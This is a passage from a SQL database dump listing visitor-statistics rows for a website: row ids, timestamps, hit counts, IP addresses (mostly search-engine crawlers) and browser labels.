'),(19154,1457747958,1,1,0,0,'141.8.132.99','other'),(19155,1457747959,9,9,0,0,'93.158.152.9','other'),(19156,1457748002,2,2,0,0,'66.249.66.166','other'),(19157,1457748012,1,0,1,0,'66.249.66.129',''),(19158,1457748091,2,2,0,0,'157.55.39.101','other'),(19159,1457748291,4,4,0,0,'66.249.66.129','other'),(19160,1457748554,1,1,0,0,'66.249.66.190','other'),(19161,1457748914,1,1,0,0,'66.249.66.166','other'),(19162,1457748924,3,3,0,0,'66.249.66.162','other'),(19163,1457748962,2,1,1,0,'66.249.66.158',''),(19164,1457749028,23,23,0,0,'141.8.184.18','other'),(19165,1457749029,29,29,0,0,'141.8.183.14','other'),(19167,1457749210,1,1,0,0,'188.162.228.140','chrome'),(19168,1457749379,45,45,0,0,'5.255.253.53','other'),(19169,1457749595,43,43,0,0,'93.158.152.9','other'),(19171,1457749597,48,48,0,0,'130.193.37.21','other'),(19172,1457749598,1,0,1,0,'66.249.66.133',''),(19173,1457749644,48,48,0,0,'178.154.149.11','other'),(19174,1457749647,12,12,0,0,'5.255.253.100','other'),(19175,1457749648,37,37,0,0,'141.8.132.99','other'),(19176,1457749666,4,4,0,0,'66.249.66.158','other'),(19177,1457749738,1,1,0,0,'66.249.66.190','other'),(19178,1457749741,10,10,0,0,'130.193.51.45','other'),(19179,1457749930,26,26,0,0,'141.8.184.18','other'),(19180,1457749954,12,12,0,0,'141.8.183.14','other'),(19181,1457750052,1,1,0,0,'130.193.51.102','other'),(19182,1457750054,2,2,0,0,'141.8.132.79','other'),(19183,1457750056,3,3,0,0,'130.193.51.81','other'),(19184,1457750182,1,0,1,0,'66.249.66.166',''),(19185,1457750353,1,1,0,0,'141.8.142.41','other'),(19186,1457750370,5,5,0,0,'66.249.66.162','other'),(19187,1457750458,1,1,0,0,'141.8.142.88','other'),(19188,1457750459,1,1,0,0,'141.8.132.76','other'),(19189,1457750715,1,0,1,0,'68.180.229.232',''),(19190,1457750739,1,1,0,0,'157.55.39.225','other'),(19191,1457750742,1,1,0,0,'5.255.253.30','other'),(19192,1457750744,1,1,0,0,'130.193.37.27','other'),(19193,1457751236,1,1,0,0,'164.132.161.22','other'),(19194,1457751471,1,1,0,0,'66.249.66.166','other'),(19195,1457751523,1,1,0,0,'66.249.66.129','other'),(19196,1457751581,1,0,1,0,'66.249.66.158',''),(19197,1457751592,2,2,0,0,'66.249.66.162','other'),(19198,1457751738,1,1,0,0,'62.210.215.100','chrome'),(19199,1457751895,1,1,0,0,'66.249.66.133','other'),(19200,1457751929,1,1,0,0,'66.249.66.158','other'),(19201,1457752135,8,8,0,0,'141.8.184.18','other'),(19202,1457752137,3,3,0,0,'178.154.149.11','other'),(19203,1457752146,1,1,0,0,'141.8.183.14','other'),(19204,1457752197,1,1,0,0,'40.77.167.79','other'),(19205,1457752423,1,1,0,0,'217.69.133.226','other'),(19206,1457753144,1,0,1,0,'66.249.66.166',''),(19207,1457753154,5,0,5,0,'66.249.66.158',''),(19208,1457753522,1,1,0,0,'8.29.198.25','other'),(19209,1457753917,1,1,0,0,'217.69.133.85','other'),(19210,1457753970,1,0,1,0,'66.249.66.162',''),(19211,1457754324,1,1,0,0,'51.255.65.22','other'),(19212,1457754639,1,1,0,0,'66.249.66.158','other'),(19213,1457754706,2,2,0,0,'141.8.184.18','other'),(19215,1457754707,3,3,0,0,'178.154.149.11','other'),(19216,1457754708,1,1,0,0,'5.255.253.100','other'),(19217,1457754711,1,1,0,0,'5.255.253.53','other'),(19218,1457754713,1,1,0,0,'141.8.132.99','other'),(19220,1457754724,1,1,0,0,'157.55.39.225','other'),(19221,1457755264,1,1,0,0,'164.132.161.63','other'),(19222,1457755352,1,0,1,0,'66.249.66.190',''),(19223,1457755380,1,1,0,0,'164.132.161.68','other'),(19224,1457755426,1,0,1,0,'66.249.66.166',''),(19225,1457755991,1,1,0,0,'66.249.92.99','other'),(19226,1457756199,1,1,0,0,'180.76.15.149','other'),(19227,1457756407,2,0,2,0,'66.249.66.166',''),(19228,1457756653,12,12,0,0,'141.8.184.18','other'),(19229,1457756654,22,22,0,0,'141.8.183.14','other'),(19230,1457756655,10,10,0,0,'93.158.152.9','other'),(19231,1457756660,19,19,0,0,'178.154.149.11','other'),(19232,1457756662,2,2,0,0,'130.193.37.21','other'),(19233,1457756666,7,7,0,0,'5.255.253.53','other'),(19234,1457757000,1,1,0,0,'207.46.13.106','other'),(19235,1457757008,1,0,1,0,'66.249.66.158',''),(19236,1457757184,1,1,0,0,'51.255.65.12','other'),(19237,1457757309,1,0,1,0,'68.180.231.35',''),(19238,1457757862,1,1,0,0,'157.55.39.101','other'),(19239,1457758726,1,1,0,0,'141.8.184.18','other'),(19241,1457758727,6,6,0,0,'178.154.149.11','other'),(19242,1457758729,2,2,0,0,'141.8.183.14','other'),(19243,1457758732,1,1,0,0,'93.158.152.9','other'),(19244,1457758733,4,4,0,0,'5.255.253.53','other'),(19245,1457758865,3,0,3,0,'66.249.66.162',''),(19246,1457759384,1,1,0,0,'217.69.133.216','other'),(19247,1457759544,1,1,0,0,'217.69.133.217','other'),(19248,1457759659,5,0,5,0,'66.249.66.158',''),(19249,1457760495,1,0,1,0,'66.249.66.166',''),(19250,1457760639,2,0,2,0,'66.249.66.162',''),(19251,1457760673,1,0,1,0,'66.249.66.158',''),(19252,1457760770,1,0,1,0,'66.249.66.133',''),(19253,1457761050,4,4,0,0,'141.8.184.18','other'),(19254,1457761051,4,4,0,0,'178.154.149.11','other'),(19255,1457761052,2,2,0,0,'5.255.253.53','other'),(19256,1457761054,2,2,0,0,'130.193.37.21','other'),(19257,1457761055,3,3,0,0,'141.8.183.14','other'),(19258,1457762303,1,1,0,0,'157.55.39.101','other'),(19259,1457762687,1,1,0,0,'66.249.93.90','chrome'),(19260,1457762688,1,0,1,0,'66.249.66.166',''),(19261,1457762706,2,0,2,0,'66.249.66.158',''),(19262,1457762758,1,1,0,0,'217.69.133.226','other'),(19263,1457762987,2,2,0,0,'5.255.253.53','other'),(19264,1457762988,2,2,0,0,'130.193.37.21','other'),(19265,1457762989,2,2,0,0,'178.154.149.11','other'),(19266,1457762992,1,1,0,0,'141.8.132.99','other'),(19267,1457763270,1,1,0,0,'51.255.65.67','other'),(19268,1457763364,1,1,0,0,'157.55.39.225','other'),(19269,1457763377,1,1,0,0,'91.196.178.66','firefox'),(19270,1457763387,1,1,0,0,'164.132.161.42','other'),(19271,1457763896,1,0,1,0,'66.249.66.190',''),(19272,1457764037,1,0,1,0,'66.249.66.129',''),(19273,1457764188,1,1,0,0,'107.178.194.65','chrome'),(19274,1457764344,1,1,0,0,'8.29.198.25','other'),(19275,1457764345,1,1,0,0,'217.69.133.217','other'),(19276,1457764539,2,2,0,0,'141.8.184.18','other'),(19277,1457764540,1,1,0,0,'141.8.183.14','other'),(19278,1457764541,1,0,1,0,'66.249.66.162',''),(19281,1457764542,2,2,0,0,'178.154.149.11','other'),(19282,1457764546,3,0,3,0,'66.249.66.158',''),(19283,1457764548,1,1,0,0,'157.55.39.225','other'),(19284,1457765115,1,1,0,0,'130.193.51.43','other'),(19285,1457765117,1,1,0,0,'5.255.253.53','other'),(19286,1457765119,1,1,0,0,'130.193.37.21','other'),(19287,1457765168,1,1,0,0,'217.69.133.218','other'),(19288,1457765318,1,0,1,0,'66.249.66.129',''),(19289,1457765524,1,0,1,0,'66.249.66.190',''),(19290,1457765819,1,1,0,0,'62.210.215.100','chrome'),(19291,1457765830,3,0,3,0,'66.249.66.162',''),(19292,1457766039,1,0,1,0,'66.249.66.158',''),(19293,1457766413,4,4,0,0,'141.8.183.14','other'),(19295,1457766415,4,4,0,0,'141.8.184.18','other'),(19297,1457766416,2,2,0,0,'93.158.152.9','other'),(19298,1457766418,2,2,0,0,'178.154.149.11','other'),(19299,1457766420,5,5,0,0,'5.255.253.53','other'),(19300,1457766644,1,0,1,0,'66.249.66.166',''),(19301,1457766731,1,1,0,0,'78.111.190.85','other'),(19302,1457766771,2,2,0,0,'91.200.12.141','chrome'),(19303,1457767191,1,1,0,0,'66.249.92.103','other'),(19304,1457767205,2,0,2,0,'66.249.66.162',''),(19305,1457767216,9,0,9,0,'66.249.66.158',''),(19306,1457767247,1,1,0,0,'5.255.253.10','other'),(19307,1457767248,1,1,0,0,'141.8.142.10','other'),(19309,1457767249,1,1,0,0,'141.8.184.22','other'),(19310,1457767250,1,1,0,0,'141.8.142.88','other'),(19311,1457767251,1,1,0,0,'141.8.132.76','other'),(19312,1457767252,1,1,0,0,'141.8.142.8','other'),(19313,1457767639,1,1,0,0,'180.76.15.160','other'),(19314,1457767959,1,1,0,0,'78.111.185.34','firefox'),(19315,1457768358,2,2,0,0,'91.196.178.67','chrome'),(19316,1457768490,1,1,0,0,'217.69.133.223','other'),(19317,1457768797,1,1,0,0,'78.111.186.167','opera'),(19318,1457768934,1,1,0,0,'141.8.142.41','other'),(19320,1457769123,1,1,0,0,'217.69.133.224','other'),(19321,1457769318,1,1,0,0,'37.53.20.40','chrome'),(19322,1457769768,1,0,1,0,'66.249.66.158',''),(19323,1457769807,1,1,0,0,'217.69.133.67','other'),(19325,1457769971,1,1,0,0,'93.75.2.233','firefox'),(19326,1457770035,2,0,2,0,'66.249.66.166',''),(19327,1457770365,1,1,0,0,'46.200.154.172','chrome'),(19328,1457770565,1,0,1,0,'66.249.66.162',''),(19329,1457770713,1,1,0,0,'217.69.133.219','other'),(19330,1457770739,2,1,1,0,'66.249.66.166',''),(19331,1457770763,1,1,0,0,'66.249.66.162','other'),(19332,1457770785,3,3,0,0,'66.249.66.158','other'),(19333,1457770851,2,2,0,0,'141.8.184.18','other'),(19335,1457771206,1,1,0,0,'5.255.253.55','other'),(19336,1457771207,1,1,0,0,'141.8.132.76','other'),(19337,1457771981,1,1,0,0,'157.55.39.225','other'),(19338,1457772504,1,0,1,0,'66.249.66.158',''),(19339,1457772990,1,1,0,0,'91.196.178.71','firefox'),(19340,1457772999,1,1,0,0,'91.196.178.72','chrome'),(19341,1457773726,1,1,0,0,'207.46.13.106','other'),(19342,1457773856,1,0,1,0,'66.249.66.158',''),(19343,1457773861,1,0,1,0,'66.249.66.166',''),(19344,1457773901,1,1,0,0,'180.76.15.154','other'),(19345,1457773993,1,1,0,0,'89.234.157.254','chrome'),(19346,1457774011,1,1,0,0,'91.219.236.218','chrome'),(19347,1457774513,1,1,0,0,'178.154.189.203','other'),(19348,1457774727,1,1,0,0,'66.102.9.104','chrome'),(19349,1457775011,1,1,0,0,'91.196.177.69','chrome'),(19350,1457775076,4,4,0,0,'93.158.152.9','other'),(19351,1457775080,19,19,0,0,'141.8.184.18','other'),(19352,1457775084,2,2,0,0,'141.8.142.8','other'),(19353,1457775092,1,1,0,0,'130.193.51.85','other'),(19354,1457775096,1,1,0,0,'5.255.253.10','other'),(19355,1457775099,1,1,0,0,'141.8.132.76','other'),(19356,1457775103,2,2,0,0,'141.8.132.99','other'),(19357,1457775107,1,1,0,0,'5.255.253.55','other'),(19358,1457775110,6,6,0,0,'178.154.149.11','other'),(19359,1457775114,1,1,0,0,'93.158.152.26','other'),(19360,1457775118,1,1,0,0,'130.193.37.27','other'),(19361,1457775121,1,1,0,0,'130.193.51.81','other'),(19362,1457775125,1,1,0,0,'130.193.37.21','other'),(19363,1457775132,4,4,0,0,'141.8.183.14','other'),(19364,1457775133,1,0,1,0,'66.249.66.166',''),(19365,1457775155,2,2,0,0,'5.255.253.53','other'),(19366,1457775212,1,1,0,0,'8.29.198.26','other'),(19367,1457775830,1,1,0,0,'141.8.184.22','other'),(19368,1457775836,1,1,0,0,'130.193.51.45','other'),(19369,1457775839,1,1,0,0,'141.8.132.97','other'),(19370,1457775842,1,1,0,0,'5.255.253.110','other'),(19371,1457775913,1,1,0,0,'157.55.39.101','other'),(19372,1457776141,1,0,1,0,'66.249.66.162',''),(19373,1457776466,1,1,0,0,'217.69.133.219','other'),(19374,1457777189,1,1,0,0,'37.54.166.24','chrome'),(19375,1457777411,3,3,0,0,'141.8.184.18','other'),(19376,1457777429,1,1,0,0,'91.196.178.71','firefox'),(19377,1457777526,1,1,0,0,'178.154.149.11','other'),(19378,1457777784,1,1,0,0,'66.249.92.95','other'),(19379,1457777869,1,1,0,0,'138.201.18.168','firefox'),(19380,1457778062,1,1,0,0,'62.210.215.100','chrome'),(19381,1457778334,1,0,1,0,'66.249.66.158',''),(19382,1457778354,1,1,0,0,'178.154.189.204','other'),(19383,1457778548,1,1,0,0,'81.30.161.125','opera'),(19384,1457778700,2,0,2,0,'66.249.66.162',''),(19385,1457779041,1,1,0,0,'91.196.178.69','chrome'),(19386,1457779475,2,0,2,0,'68.180.229.176',''),(19387,1457780181,1,1,0,0,'141.8.184.18','other'),(19388,1457780186,1,1,0,0,'178.154.149.11','other'),(19389,1457780240,1,1,0,0,'91.196.178.134','other'),(19390,1457780316,1,1,0,0,'217.69.133.220','other'),(19391,1457780620,1,1,0,0,'157.55.39.225','other'),(19392,1457780762,1,1,0,0,'66.249.66.166','other'),(19393,1457780812,1,1,0,0,'66.249.66.162','other'),(19394,1457780824,1,1,0,0,'66.249.66.158','other'),(19395,1457780825,1,0,1,0,'66.249.66.133',''),(19396,1457781064,1,1,0,0,'157.55.39.101','other'),(19397,1457781291,1,1,0,0,'62.210.215.100','chrome'),(19398,1457781332,1,1,0,0,'180.76.15.155','other'),(19399,1457781530,2,2,0,0,'217.69.133.219','other'),(19400,1457781621,1,1,0,0,'207.46.13.106','other'),(19401,1457781768,1,0,1,0,'66.249.66.162',''),(19402,1457782086,1,1,0,0,'217.69.133.217','other'),(19403,1457782147,1,1,0,0,'217.69.133.216','other'),(19404,1457782148,2,2,0,0,'217.69.133.67','other'),(19405,1457782959,1,0,1,0,'66.249.66.166',''),(19406,1457783231,13,13,0,0,'141.8.184.18','other'),(19407,1457783293,3,3,0,0,'178.154.149.11','other'),(19408,1457783308,2,0,2,0,'66.249.66.162',''),(19409,1457783320,1,0,1,0,'66.249.66.158',''),(19410,1457783596,1,1,0,0,'176.77.49.90','msie'),(19411,1457783597,1,1,0,0,'5.164.115.102','msie'),(19412,1457783602,1,1,0,0,'128.68.5.240','msie'),(19413,1457783604,1,1,0,0,'5.164.69.42','msie'),(19414,1457783634,1,1,0,0,'40.77.167.79','other'),(19415,1457783679,1,1,0,0,'157.55.39.225','other'),(19416,1457785045,1,1,0,0,'141.8.132.2','other'),(19417,1457785047,1,1,0,0,'93.158.152.26','other'),(19418,1457785051,1,1,0,0,'141.8.142.10','other'),(19419,1457785067,4,4,0,0,'63.141.226.178','other'),(19420,1457785112,1,1,0,0,'130.193.37.27','other'),(19421,1457785114,1,1,0,0,'130.193.51.85','other'),(19422,1457785116,1,1,0,0,'141.8.142.8','other'),(19423,1457785118,1,1,0,0,'141.8.184.18','other'),(19424,1457785120,1,1,0,0,'141.8.183.14','other'),(19425,1457785123,1,1,0,0,'93.158.152.9','other'),(19426,1457785125,1,1,0,0,'5.255.253.53','other'),(19427,1457785127,1,1,0,0,'130.193.37.21','other'),(19428,1457785129,1,1,0,0,'141.8.132.99','other'),(19429,1457785132,1,1,0,0,'5.255.253.100','other'),(19430,1457785614,1,0,1,0,'66.249.66.166',''),(19431,1457786076,1,1,0,0,'217.69.133.223','other'),(19433,1457786127,1,1,0,0,'8.29.198.26','other'),(19434,1457786449,1,1,0,0,'217.69.133.216','other'),(19435,1457786843,1,1,0,0,'207.46.13.106','other'),(19436,1457787115,1,1,0,0,'217.69.133.218','other'),(19437,1457787138,1,0,1,0,'66.249.66.158',''),(19438,1457787336,2,2,0,0,'141.8.184.18','other'),(19439,1457787758,1,1,0,0,'217.69.133.85','other'),(19440,1457788313,1,1,0,0,'66.249.92.95','other'),(19441,1457789372,1,1,0,0,'157.55.39.225','other'),(19442,1457789871,1,1,0,0,'66.249.66.162','other'),(19443,1457789962,1,1,0,0,'91.196.177.19','chrome'),(19444,1457790226,1,1,0,0,'178.154.149.11','other'),(19445,1457790229,1,1,0,0,'141.8.184.18','other'),(19446,1457790304,1,1,0,0,'62.210.215.100','chrome'),(19447,1457790555,1,1,0,0,'180.76.15.144','other'),(19448,1457790817,1,0,1,0,'66.249.66.162',''),(19449,1457790986,1,0,1,0,'66.249.66.166',''),(19450,1457790988,2,2,0,0,'66.249.66.162','other'),(19451,1457791009,4,4,0,0,'66.249.66.158','other'),(19452,1457791549,10,10,0,0,'141.8.184.18','other'),(19453,1457791638,2,2,0,0,'66.249.66.166','other'),(19454,1457791728,1,1,0,0,'217.69.133.68','other'),(19455,1457791736,1,1,0,0,'178.154.149.11','other'),(19456,1457792053,1,0,1,0,'66.249.66.158',''),(19457,1457792096,2,0,2,0,'66.249.66.162',''),(19458,1457792110,3,3,0,0,'66.249.66.158','other'),(19459,1457792487,1,1,0,0,'217.69.133.84','other'),(19460,1457792488,1,1,0,0,'217.69.133.67','other'),(19461,1457792869,1,1,0,0,'37.9.122.203','other'),(19462,1457792893,1,0,1,0,'66.249.66.133',''),(19463,1457793048,3,3,0,0,'66.249.66.166','other'),(19464,1457793160,1,0,1,0,'66.249.66.158',''),(19465,1457793427,1,1,0,0,'217.69.133.217','other'),(19466,1457793428,1,1,0,0,'217.69.133.218','other'),(19467,1457793599,1,1,0,0,'207.46.13.94','other'),(19468,1457793607,1,1,0,0,'66.249.66.158','other'),(19469,1457793764,1,1,0,0,'66.249.66.162','other'),(19470,1457794032,1,1,0,0,'141.8.183.14','other'),(19471,1457794034,1,1,0,0,'178.154.149.11','other'),(19472,1457794287,1,0,1,0,'66.249.66.166',''),(19473,1457794722,1,1,0,0,'157.55.39.101','other'),(19474,1457794913,1,1,0,0,'5.9.111.70','other'),(19475,1457794981,1,1,0,0,'217.69.133.248','other'),(19476,1457794982,1,1,0,0,'66.249.66.190','other'),(19477,1457795101,3,0,3,0,'66.249.66.158',''),(19478,1457795395,1,1,0,0,'178.154.149.11','other'),(19479,1457795399,5,5,0,0,'141.8.184.18','other'),(19480,1457795639,1,1,0,0,'93.158.152.9','other'),(19481,1457795690,1,1,0,0,'93.73.22.191','firefox'),(19482,1457795826,1,0,1,0,'66.249.66.166',''),(19483,1457795852,2,0,2,0,'66.249.66.162',''),(19484,1457795935,1,1,0,0,'157.55.39.101','other'),(19485,1457796643,1,1,0,0,'217.69.133.223','other'),(19486,1457796700,1,1,0,0,'46.211.154.91','chrome'),(19487,1457796937,1,1,0,0,'8.29.198.25','other'),(19488,1457797032,1,1,0,0,'217.69.133.220','other'),(19489,1457797560,2,2,0,0,'93.158.152.9','other'),(19490,1457797567,1,1,0,0,'141.8.132.99','other'),(19491,1457797659,1,0,1,0,'66.249.66.162',''),(19492,1457797896,1,1,0,0,'207.46.13.106','other'),(19493,1457797945,1,0,1,0,'66.249.66.158',''),(19494,1457797985,1,0,1,0,'68.180.229.104',''),(19495,1457798233,1,1,0,0,'217.69.133.219','other'),(19496,1457798344,1,1,0,0,'141.8.142.41','other'),(19497,1457798345,1,1,0,0,'141.8.184.31','other'),(19498,1457798347,1,1,0,0,'130.193.51.43','other'),(19499,1457798699,1,1,0,0,'66.249.92.103','other'),(19500,1457798930,1,1,0,0,'46.211.154.91','chrome'),(19501,1457799004,1,1,0,0,'207.46.13.106','other'),(19502,1457799165,1,0,1,0,'66.249.66.162',''),(19503,1457799366,1,1,0,0,'37.9.122.201','other'),(19504,1457799370,1,1,0,0,'93.158.152.202','other'),(19505,1457799374,1,1,0,0,'178.154.189.204','other'),(19506,1457799906,2,2,0,0,'178.154.149.11','other'),(19507,1457799910,1,1,0,0,'141.8.183.14','other'),(19508,1457799949,1,1,0,0,'141.8.184.18','other'),(19509,1457801587,1,0,1,0,'66.249.66.158',''),(19510,1457801911,1,1,0,0,'217.69.133.225','other'),(19511,1457802009,1,0,1,0,'66.249.66.133',''),(19512,1457802156,4,4,0,0,'141.8.184.18','other'),(19513,1457802200,4,4,0,0,'178.154.149.11','other'),(19514,1457802201,5,5,0,0,'141.8.183.14','other'),(19516,1457802513,1,0,1,0,'66.249.66.158',''),(19517,1457802597,1,1,0,0,'217.69.133.68','other'),(19518,1457802766,1,1,0,0,'157.55.39.225','other'),(19519,1457802787,1,1,0,0,'62.210.215.100','chrome'),(19520,1457803211,1,1,0,0,'217.69.133.218','other'),(19521,1457803239,2,2,0,0,'157.55.39.101','other'),(19522,1457803728,2,0,2,0,'66.249.66.162',''),(19523,1457804093,3,3,0,0,'141.8.184.18','other'),(19524,1457804284,1,0,1,0,'66.249.66.166',''),(19525,1457804320,1,1,0,0,'178.154.149.11','other'),(19526,1457804437,1,0,1,0,'66.249.66.158',''),(19527,1457804784,1,1,0,0,'194.44.128.157','firefox'),(19528,1457804834,2,0,2,0,'66.249.66.162',''),(19529,1457805155,1,1,0,0,'157.55.39.225','other'),(19530,1457805307,1,1,0,0,'95.133.238.20','chrome'),(19531,1457805513,3,3,0,0,'31.172.191.135','chrome'),(19532,1457806078,1,1,0,0,'78.111.190.10','chrome'),(19533,1457806115,1,1,0,0,'141.8.132.99','other'),(19534,1457806813,1,1,0,0,'62.210.215.100','chrome'),(19535,1457807224,2,0,2,0,'66.249.66.158',''),(19536,1457807352,1,0,1,0,'66.249.66.162',''),(19537,1457807386,2,2,0,0,'178.154.189.204','other'),(19538,1457807742,1,1,0,0,'180.76.15.8','other'),(19539,1457807792,1,1,0,0,'8.29.198.25','other'),(19540,1457808166,1,1,0,0,'141.8.184.18','other'),(19541,1457808167,1,1,0,0,'178.154.149.11','other'),(19543,1457808345,6,6,0,0,'178.154.189.204','other'),(19544,1457808532,1,1,0,0,'217.69.133.68','other'),(19545,1457808880,1,1,0,0,'217.69.133.218','other'),(19546,1457809247,1,1,0,0,'157.55.39.101','other'),(19547,1457809251,1,1,0,0,'66.249.92.103','other'),(19548,1457809427,1,1,0,0,'157.55.39.225','other'),(19549,1457809508,1,1,0,0,'217.69.133.85','other'),(19550,1457809837,1,0,1,0,'68.180.229.104',''),(19551,1457810363,138,138,0,0,'178.151.143.163','other'),(19552,1457810580,1,0,1,0,'66.249.66.190',''),(19553,1457810653,2,2,0,0,'207.46.13.106','other'),(19554,1457810754,1,1,0,0,'178.154.189.204','other'),(19555,1457810773,2,2,0,0,'5.255.253.53','other'),(19556,1457810774,1,1,0,0,'130.193.37.21','other'),(19557,1457810775,2,2,0,0,'141.8.183.14','other'),(19558,1457810777,1,1,0,0,'93.158.152.9','other'),(19559,1457810778,1,1,0,0,'141.8.184.18','other'),(19561,1457811070,1,0,1,0,'66.249.66.166',''),(19562,1457811928,1,1,0,0,'207.46.13.106','other'),(19563,1457812052,1,1,0,0,'180.76.15.140','other'),(19564,1457812101,1,1,0,0,'180.76.15.141','other'),(19565,1457812986,1,1,0,0,'157.55.39.101','other'),(19566,1457813359,1,1,0,0,'217.69.133.221','other'),(19567,1457813474,1,1,0,0,'207.46.13.94','other'),(19568,1457813575,1,1,0,0,'188.163.5.62','chrome'),(19569,1457813634,1,1,0,0,'92.249.93.206','chrome'),(19570,1457814578,1,1,0,0,'217.69.133.216','other'),(19571,1457814715,1,1,0,0,'66.249.66.166','other'),(19572,1457814902,1,0,1,0,'66.249.66.158',''),(19573,1457815007,1,1,0,0,'178.154.149.11','other'),(19574,1457815029,1,1,0,0,'62.210.215.100','chrome'),(19575,1457815043,1,1,0,0,'66.249.66.158','other'),(19576,1457815240,1,1,0,0,'128.72.60.161','other'),(19580,1457815241,1,1,0,0,'37.110.70.102','msie'),(19581,1457815353,1,1,0,0,'141.8.142.8','other'),(19582,1457815354,1,1,0,0,'178.154.189.6','other'),(19583,1457815630,1,1,0,0,'180.76.15.137','other'),(19584,1457816189,1,0,1,0,'66.249.66.158',''),(19585,1457816304,1,1,0,0,'217.69.133.84','other'),(19586,1457816528,1,1,0,0,'220.181.108.147','other'),(19587,1457817127,1,1,0,0,'130.193.50.22','other'),(19588,1457818008,13,13,0,0,'94.154.239.69','other'),(19589,1457818624,1,0,1,0,'66.249.66.162',''),(19590,1457818626,1,1,0,0,'8.29.198.26','other'),(19591,1457819048,1,1,0,0,'157.55.39.101','other'),(19592,1457819087,1,1,0,0,'217.69.133.224','other'),(19594,1457819091,1,0,1,0,'68.180.229.104',''),(19595,1457819725,1,1,0,0,'207.46.13.94','other'),(19596,1457819815,1,1,0,0,'217.69.133.220','other'),(19598,1457820422,2,0,2,0,'66.249.66.158',''),(19599,1457820541,1,1,0,0,'66.249.92.99','other'),(19600,1457821155,1,0,1,0,'66.249.66.162',''),(19601,1457821327,1,1,0,0,'217.69.133.216','other'),(19602,1457821546,1,0,1,0,'66.249.66.190',''),(19603,1457821636,1,1,0,0,'5.255.253.53','other'),(19604,1457821640,11,11,0,0,'141.8.183.14','other'),(19605,1457821644,66,66,0,0,'141.8.184.18','other'),(19606,1457821686,32,32,0,0,'178.154.149.11','other'),(19607,1457821931,1,1,0,0,'93.158.152.9','other'),(19608,1457822361,1,1,0,0,'141.8.132.2','other'),(19609,1457822362,1,1,0,0,'5.255.253.9','other'),(19610,1457822580,2,2,0,0,'141.8.183.14','other'),(19611,1457822581,1,1,0,0,'141.8.132.99','other'),(19612,1457822711,2,0,2,0,'66.249.66.158',''),(19613,1457822810,3,3,0,0,'130.193.51.45','other'),(19614,1457822811,2,2,0,0,'178.154.149.11','other'),(19615,1457822826,1,1,0,0,'141.8.142.88','other'),(19616,1457822986,1,1,0,0,'141.8.184.11','other'),(19617,1457823273,4,4,0,0,'130.193.37.21','other'),(19618,1457823274,5,5,0,0,'93.158.152.26','other'),(19619,1457823276,1,1,0,0,'5.255.253.30','other'),(19621,1457823277,19,19,0,0,'141.8.184.18','other'),(19622,1457823342,2,2,0,0,'37.9.122.203','other'),(19623,1457823355,1,0,1,0,'66.249.66.166',''),(19624,1457823456,2,0,2,0,'66.249.66.162',''),(19625,1457823573,6,6,0,0,'130.193.51.85','other'),(19626,1457823636,7,7,0,0,'141.8.132.99','other'),(19627,1457823638,6,6,0,0,'130.193.51.102','other'),(19628,1457823639,3,3,0,0,'130.193.37.27','other'),(19630,1457823640,3,3,0,0,'93.158.152.9','other'),(19631,1457823643,10,10,0,0,'5.255.253.100','other'),(19632,1457823644,12,12,0,0,'141.8.183.14','other'),(19633,1457823709,6,6,0,0,'5.255.253.110','other'),(19634,1457823710,7,7,0,0,'141.8.142.41','other'),(19636,1457823719,18,18,0,0,'178.154.149.11','other'),(19637,1457823720,6,6,0,0,'130.193.51.45','other'),(19638,1457823777,7,7,0,0,'141.8.184.22','other'),(19639,1457823778,7,7,0,0,'141.8.132.76','other'),(19640,1457823783,7,7,0,0,'141.8.132.2','other'),(19641,1457823784,6,6,0,0,'5.255.253.9','other'),(19642,1457823976,8,8,0,0,'141.8.142.88','other'),(19643,1457823978,6,6,0,0,'5.255.253.53','other'),(19644,1457823979,2,2,0,0,'130.193.51.43','other'),(19645,1457823980,6,6,0,0,'141.8.184.11','other'),(19646,1457824036,5,5,0,0,'141.8.132.79','other'),(19647,1457824115,8,8,0,0,'5.255.253.10','other'),(19648,1457824116,3,0,3,0,'66.249.66.158',''),(19650,1457824117,5,5,0,0,'141.8.132.97','other'),(19651,1457824139,5,5,0,0,'141.8.142.8','other'),(19652,1457824168,2,2,0,0,'5.255.253.55','other'),(19653,1457824173,4,4,0,0,'141.8.142.10','other'),(19654,1457824183,2,2,0,0,'141.8.184.18','other'),(19655,1457824185,3,3,0,0,'130.193.51.81','other'),(19656,1457824190,2,2,0,0,'130.193.37.21','other'),(19657,1457824194,6,6,0,0,'93.158.152.26','other'),(19658,1457824195,1,1,0,0,'130.193.50.22','other'),(19659,1457824201,1,1,0,0,'5.255.253.30','other'),(19660,1457824439,5,5,0,0,'82.193.127.15','other'),(19661,1457824510,1,1,0,0,'217.69.133.68','other'),(19662,1457824614,1,0,1,0,'66.249.66.129',''),(19663,1457824634,1,1,0,0,'141.8.142.41','other'),(19664,1457824678,1,1,0,0,'141.8.183.14','other'),(19665,1457824680,1,1,0,0,'141.8.132.99','other'),(19666,1457824854,1,0,1,0,'66.249.66.190',''),(19667,1457824862,1,1,0,0,'130.193.51.102','other'),(19668,1457825145,1,1,0,0,'178.154.149.11','other'),(19669,1457825233,1,0,1,0,'66.249.66.158',''),(19670,1457825287,1,1,0,0,'40.77.167.58','other'),(19671,1457825448,2,2,0,0,'93.158.152.9','other'),(19672,1457825449,2,2,0,0,'5.255.253.10','other'),(19673,1457825579,4,4,0,0,'141.8.183.14','other'),(19674,1457825645,3,3,0,0,'141.8.132.99','other'),(19675,1457825872,1,0,1,0,'66.249.66.166',''),(19676,1457825918,1,1,0,0,'37.9.122.202','other'),(19677,1457825931,4,4,0,0,'130.193.51.43','other'),(19679,1457825967,3,3,0,0,'93.158.152.26','other'),(19680,1457826039,1,1,0,0,'207.46.13.94','other'),(19681,1457826205,1,1,0,0,'180.76.15.137','other'),(19682,1457826232,5,5,0,0,'5.255.253.30','other'),(19683,1457826233,4,4,0,0,'141.8.142.8','other'),(19684,1457826234,5,5,0,0,'141.8.184.22','other'),(19685,1457826236,2,2,0,0,'130.193.37.27','other'),(19686,1457826248,3,3,0,0,'178.154.149.11','other'),(19687,1457826249,7,7,0,0,'130.193.37.21','other'),(19688,1457826250,8,8,0,0,'141.8.184.11','other'),(19689,1457826251,1,1,0,0,'141.8.142.88','other'),(19690,1457826254,3,3,0,0,'130.193.51.45','other'),(19691,1457826255,5,5,0,0,'141.8.132.97','other'),(19692,1457826256,5,5,0,0,'141.8.132.76','other'),(19693,1457826257,2,2,0,0,'141.8.184.18','other'),(19694,1457826261,3,3,0,0,'5.255.253.55','other'),(19695,1457826264,4,4,0,0,'130.193.51.102','other'),(19696,1457826265,3,3,0,0,'141.8.132.79','other'),(19697,1457826269,1,1,0,0,'141.8.142.82','other'),(19698,1457826270,2,2,0,